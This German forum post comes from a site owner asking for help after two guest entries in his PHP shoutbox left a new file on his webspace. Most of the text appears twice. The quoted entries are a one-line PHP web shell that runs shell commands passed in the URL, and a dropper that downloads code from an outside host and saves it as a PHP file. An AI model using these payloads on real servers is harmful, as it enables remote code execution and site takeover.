Hallo,
hatte heute in unserer Shoutbox 2 seltsame Einträge von einem Gast.
1.
2.
Erst dachte ich mir, daß es sich um einen Spinner handelt, habe dann aber vorsichtshalber auf unserem Webspace nachgeschaut ob etwas auffällig ist.
In dem Webordner, wo unsere PHP-Shoutbox drin ist konnte ich ein neues File finden mit dem Name "z.txt"
Der Inhalt der Datei entspricht auch dem Inhalt des Links aus dem zweiten Teil in der Shoutbox.
Ich habe das File sofort gelöscht und stelle mir jetzt die Frage wie es möglich ist, daß jemand auf unserem Webserver so einfach eine Datei anlegen kann.
Muss ich mir Sorgen machen ????
Bin für jede Art von Hilfe dankbar
Viele Grüße Ray
hatte heute in unserer Shoutbox 2 seltsame Einträge von einem Gast.
1.
Code:
<?php system($_GET["cmd"]); ?>
Code:
<?php $z=fopen("z.php",'w');fwrite($z,file_get_contents("http://faevs.com/z.txt"));fclose($z); ?>
In dem Webordner, wo unsere PHP-Shoutbox drin ist konnte ich ein neues File finden mit dem Name "z.txt"
Der Inhalt der Datei entspricht auch dem Inhalt des Links aus dem zweiten Teil in der Shoutbox.
Ich habe das File sofort gelöscht und stelle mir jetzt die Frage wie es möglich ist, daß jemand auf unserem Webserver so einfach eine Datei anlegen kann.
Muss ich mir Sorgen machen ????
Bin für jede Art von Hilfe dankbar
Viele Grüße Ray
Kommentar